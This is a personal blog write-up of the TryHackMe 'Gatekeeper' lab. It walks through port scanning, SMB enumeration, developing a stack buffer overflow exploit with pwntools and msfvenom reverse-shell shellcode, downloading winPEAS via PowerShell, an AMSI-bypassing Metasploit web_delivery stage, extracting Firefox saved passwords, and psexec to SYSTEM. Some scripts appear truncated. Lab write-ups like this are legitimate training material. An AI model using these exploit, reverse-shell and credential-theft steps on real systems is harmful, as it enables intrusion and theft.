Daniel Cano MerchΓ‘n - Hacking & Tech

Writeup Tryhackme Gatekeeper

Writeup about the Tryhackme machine Gatekeeper.

0 - Basic info

Unknown machine, black box

1 - Reconnaissance and enumeration

Quick scan

nmap -p- --open -T5 -v 10.10πŸ˜„ -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 18:50 CEST
Initiating Connect Scan at 18:50
Scanning 10.10πŸ˜„ [65535 ports]
Discovered open port 135/tcp on 10.10πŸ˜„
Discovered open port 3389/tcp on 10.10πŸ˜„
Discovered open port 445/tcp on 10.10πŸ˜„
Discovered open port 139/tcp on 10.10πŸ˜„
Connect Scan Timing: About 23.57% done; ETC: 18:52 (0:01:41 remaining)
Discovered open port 49152/tcp on 10.10πŸ˜„
Discovered open port 49153/tcp on 10.10πŸ˜„
Connect Scan Timing: About 44.58% done; ETC: 18:52 (0:01:16 remaining)
Connect Scan Timing: About 66.59% done; ETC: 18:52 (0:00:46 remaining)
Discovered open port 31337/tcp on 10.10πŸ˜„
Completed Connect Scan at 18:52, 154.43s elapsed (65535 total ports)
Nmap scan report for 10.10πŸ˜„
Host is up (0.066s latency).
Not shown: 38084 filtered ports, 27444 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 154.60 seconds

Strange port 31337 service, Elite ?

Nmap deep scan

nmap -sC -sV -Pn -p$(cat ports.txt | grep -oP '\d{2,5}/open' |  tr '/open' ' '| xargs | tr ' ' ',')  10.10πŸ˜„ -oN full_scan.txt    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 18:54 CEST
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 57.14% done; ETC: 18:55 (0:00:12 remaining)
Nmap scan report for 10.10πŸ˜„
Host is up (0.049s latency).

135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2021-07-03T16:47:05
|_Not valid after:  2022-01-02T16:47:05
|_ssl-date: 2021-07-04T16:57:01+00:00; -37s from scanner time.
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m22s, deviation: 2h00m00s, median: -37s
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d6:c1:42:81:9f (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-04T12:56:55-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-04T16:56:55
|_  start_date: 2021-07-04T16:46:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.30 seconds

Interesting user guest enabled.

Basic interaction with the service 31337:

nc 10.10πŸ˜„ 31337                                                                                                                                  

Hello !!!

Hello !!!

Hello !!!
Hello Darkness!!!

Looks like the service just prints what you sent to the server, can be a vector for a buffer overflow attack.

Manual enumeration of the service 445 smb:

smbclient --no-pass -L //10.10πŸ˜„                                                                                                                                                                                                  1 β¨―

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Users           Disk      
SMB1 disabled -- no workgroup available

Downloaded some interesting files from the share Users:

smb: \Default\> get NTUSER.DAT
getting file \Default\NTUSER.DAT of size 262144 as NTUSER.DAT (299,4 KiloBytes/sec) (average 106,0 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG
getting file \Default\NTUSER.DAT.LOG of size 1024 as NTUSER.DAT.LOG (6,8 KiloBytes/sec) (average 100,6 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG1
getting file \Default\NTUSER.DAT.LOG1 of size 189440 as NTUSER.DAT.LOG1 (362,7 KiloBytes/sec) (average 142,4 KiloBytes/sec)
smb: \Default\> get NTUSER.DAT.LOG2
getting file \Default\NTUSER.DAT.LOG2 of size 0 as NTUSER.DAT.LOG2 (0,0 KiloBytes/sec) (average 135,5 KiloBytes/sec)

smb: \Share\> ls
  .                                   D        0  Fri May 15 03:58:07 2020
  ..                                  D        0  Fri May 15 03:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 07:27:17 2020

		7863807 blocks of size 4096. 3879008 blocks available
smb: \Share\> get gatekeeper.exe
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (7,7 KiloBytes/sec) (average 7,7 KiloBytes/sec)

Passing strings to the file trying to find some interesting inside:

strings gatekeeper.exe 
WSAStartup failed: %d
getaddrinfo failed: %d
socket() failed with error: %ld
bind() failed with error: %d
listen() failed with error: %ld
[+] Listening for connections.
accept failed: %d
Received connection from remote host.
Connection handed off to handler thread.
Please send shorter lines.
[!] recvbuf exhausted. Giving up.
Client disconnected.
recv() failed: %d.
Bytes received: %d
Client requested exit.
Hello %s!!!
send failed: %d
Bytes sent: %d
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />

Also I used nmap with the script vuln to check if there are critical vulnerabilities. This is the redacted trace:

3389/tcp  open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020: 
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)

MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability with a CVSS of 9.3.

The poc can be found here


But I could not find the RCE exploit code only a simple PoC and a DoS attack that is unwanted. The PoC running was this, nothing useful:

nc 10.10πŸ˜„ 3389 < 18606.dat 

Coming back to the misterious port 31337 I created a string of 5000 chars and the string was sent to the server… crashes…

2 - Vulnerability Identification

Digging into the crash generated with the 5000 chars strings I started to study more in detail the executable file.

I used the same windows 7 tryhackme machine for the stack buffer overflow preparation. With the .exe gatekeeper.exe uploaded and running

alt text

Started sending 500 chars and directly crashed, so I tunned the char generation to a small amount chars per iteration


from pwn import *

HOST = "10.10πŸ˜„"
PORT = "31337"
LIMIT = 60
r = remote(HOST,PORT)
for x in range (1,LIMIT):
	print("[+] SENDING"+str(CHARS_FUZZ*x)+" CHARS, COUNTER:"+str(x))
	if (r.recvline(timeout=4))==b'':
		print("[!] KO")
python3 fuzz1.py
[+] Opening connection to 10.10πŸ˜„ on port 31337: Done
[!] KO
[*] Closed connection to 10.10πŸ˜„ port 31337

alt text

The server crashes with 150 chars.

3 - Exploit development

With this information I started analyzing the executable with Inmunity Debugger, creating a new pattern of 150 chars when the server crashes:

msf-pattern_create -l 150

Using nc to send the pattern. I got the EIP 39654138

msf-pattern_offset -l 150 -q 39654138                                                                                                                                                                                                 1 β¨―
[*] Exact match at offset 146

So the exact offset is 146

Setting up the Mona working directory:

!mona config -set workingfolder C:\Users\admin\Desktop\%p

Searching a valid memory address without protection:

!mona modules
!mona find -s "\xff\xe4"
0x080414c3 : "\xff\xe4" |  {PAGE_EXECUTE_READ} [gatekeeper.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\admin\Desktop\gatekeeper.exe)
0x080416bf : "\xff\xe4" |  {PAGE_EXECUTE_READ} [gatekeeper.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\admin\Desktop\gatekeeper.exe)

Parsing the last one to little endian:

080416bf -> “\xbf\x16\x04\x08”

Generating the badchar array without \x00 with Mona

!mona bytearray -cpb \x00

Debugging the badchars with the following python script:


from pwn import *

HOST = "10.10πŸ˜„"
PORT = "31337"
offset = 146
fuzz = "A"*offset
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
r = remote(HOST,PORT)

print("[+] SENDING")
if (r.recvline(timeout=4))==b'':
	print("[!] KO")
!mona compare -a 0012FEB8 -f C:\Users\admin\Desktop\gatekeeper\bytearray.bin

First compare reports that \x01 is also a bad char, so generating again the bytearray

!mona bytearray -cpb \x00\x01

Now I got 0a as a bad char too \x0a repeating the process with the badchar \x0a works. No more badchars are required:

So the final bad char list is \x00\x01\x0a. Using this information with msfvenom to generate a payload:

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10πŸ˜„ LPORT=4433 -f c -v shellcode -b '\x00\x01\x0a' EXITFUNC=thread 
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char shellcode[] = 

Script with the msfvenom payload:


from pwn import *

HOST = "10.10πŸ˜„"
PORT = "31337"
offset = 146
fuzz = "A"*offset
shellcode = ("\xba\x46\xae\xbc\xf1\xd9\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"

esp = "\xbf\x16\x04\x08"
nop = "\x90"*20
r = remote(HOST,PORT)

print("[+] SENDING")
if (r.recvline(timeout=4))==b'':
	print("[!] KO")

Worked on the lab machine, now pointing to the real machine:

nc -lvp 4433                                                                                                 1 β¨―
listening on [any] 4433 ...
10.10πŸ˜„: inverse host lookup failed: Unknown host
connect to [10.10πŸ˜„] from (UNKNOWN) [10.10πŸ˜„] 49204
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


Getting the flag:

C:\Users\natbat\Desktop>type user.txt.txt
type user.txt.txt

The buffer overflow in this room is credited to Justin Steven and his 
"dostackbufferoverflowgood" program.  Thank you!

Also there is a .bat file:

C:\Users\natbat\Desktop>type gatekeeperstart.bat
type gatekeeperstart.bat
@echo off
start /w C:\Users\natbat\Desktop\gatekeeper.exe
::Wait 90 seconds before restarting.

I uploaded winpeas in bat mode to enumerate better the windows machine

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10πŸ˜„:7777/bat.bat','bat.bat')" 

 [+] Files in registry that may contain credentials
   [i] Searching specific files that may contains credentials.
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ    
    DefaultUserName    REG_SZ    
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys


I was stuck for a while… and then I decided to upgrade my reverse shell with meterpreter. I was looking around without any ideas and I went back to the winpeas script because the firefox folder is not common also I found a script to extract from the firefox folder:

msf6 exploit(multi/script/web_delivery) > 
[*] 10.10πŸ˜„    web_delivery - Delivering AMSI Bypass (939 bytes)
[*] 10.10πŸ˜„    web_delivery - Delivering Payload (1904 bytes)
[*] Sending stage (175174 bytes) to 10.10πŸ˜„
[*] Meterpreter session 13 opened (10.10πŸ˜„:9990 -> 10.10πŸ˜„:49249) at 2021-07-04 23:49:12 +0200

msf6 post(multi/gather/firefox_creds) > set SESSION 13
msf6 post(multi/gather/firefox_creds) > exploit

[-] Error loading USER S-1-5-21-663372427-3699997616-3390412905-1000: Hive could not be loaded, are you Admin?
[*] Checking for Firefox profile in: C:\Users\natbat\AppData\Roaming\Mozilla\

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release
[+] Downloaded cert9.db: /home/u915/.msf4/loot/20210704235048_default_10.10πŸ˜„_ff.ljfn812a.cert_415838.bin
[+] Downloaded cookies.sqlite: /home/u915/.msf4/loot/20210704235049_default_10.10πŸ˜„_ff.ljfn812a.cook_161103.bin
[+] Downloaded key4.db: /home/u915/.msf4/loot/20210704235050_default_10.10πŸ˜„_ff.ljfn812a.key4_832146.bin
[+] Downloaded logins.json: /home/u915/.msf4/loot/20210704235051_default_10.10πŸ˜„_ff.ljfn812a.logi_045138.bin

[*] Profile: C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\rajfzh3y.default

[*] Post module execution completed

Again I was hitting a wall because I did not know what to do with the firefox files. Until I discovered this:

git clone https://github.com/unode/firefox_decrypt.git

python3 firefox_decrypt.py /home/u915/Escritorio/tryhackme/gatekeeper/firefox/                                12 β¨―
2021-07-05 00:00:56,778 - WARNING - profile.ini not found in /home/u915/Escritorio/tryhackme/gatekeeper/firefox/
2021-07-05 00:00:56,779 - WARNING - Continuing and assuming '/home/u915/Escritorio/tryhackme/gatekeeper/firefox/' is a profile location

Website:   https://creds.com
Username: 'mayor'
Password: '8CL7πŸ˜„'

Using the credentials with impacket:

/usr/bin/impacket-psexec "mayor:8CL7:smile:"@10.10πŸ˜„                                            130 β¨―
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10πŸ˜„.....
[*] Found writable share ADMIN$
[*] Uploading file WFJAEcWP.exe
[*] Opening SVCManager on 10.10πŸ˜„.....
[*] Creating service yHQT on 10.10πŸ˜„.....
[*] Starting service yHQT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system

Finally rooted. Flag looted:

 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B

 Directory of C:\Users\mayor\Desktop

05/14/2020  09:58 PM    <DIR>          .
05/14/2020  09:58 PM    <DIR>          ..
05/14/2020  09:21 PM                27 root.txt.txt
               1 File(s)             27 bytes
               2 Dir(s)  15,031,672,832 bytes free

C:\Users\mayor\Desktop>type root.txt.txt

Good machine. The hardest part was thinking about the firefox folder because on the first minutes I did not put attention on the folder, I expected vulnerable flaws on Winpeas.

Thanks for reading!